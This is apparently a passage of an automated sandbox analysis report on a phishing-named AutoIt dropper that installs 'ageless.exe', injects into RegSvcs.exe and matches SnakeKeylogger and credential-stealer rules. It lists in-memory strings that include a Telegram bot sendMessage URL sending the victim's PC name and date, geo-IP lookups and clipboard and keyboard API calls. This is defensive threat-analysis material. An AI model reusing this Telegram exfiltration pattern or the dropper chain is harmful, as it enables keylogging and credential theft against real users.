                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000009.00000002.2610745756.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000283F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000283F000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000286A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000009.00000002.2610745756.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002E14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002E1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49853 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49962 version: TLS 1.2
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00F8EAFF
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00F8ED6A
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DDED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00DDED6A
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00F8EAFF
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,1_2_00F7AA57
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00FA9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00FA9576
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00DF9576

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_351a848f-7
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_582379ec-c
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, 00000001.00000003.1357102151.0000000003BE1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d51e3a06-0
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exe, 00000001.00000003.1357102151.0000000003BE1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6252972b-1
                  Source: ageless.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ageless.exe, 00000002.00000000.1357613204.0000000000E22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_00884192-1
                  Source: ageless.exe, 00000002.00000000.1357613204.0000000000E22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_16281119-6
                  Source: ageless.exe, 00000008.00000002.1573339860.0000000000E22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ac980974-c
                  Source: ageless.exe, 00000008.00000002.1573339860.0000000000E22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_60bae93a-e
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7c785d71-8
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d2b9bcf0-5
                  Source: ageless.exe.1.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_97ce39b0-f
                  Source: ageless.exe.1.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkS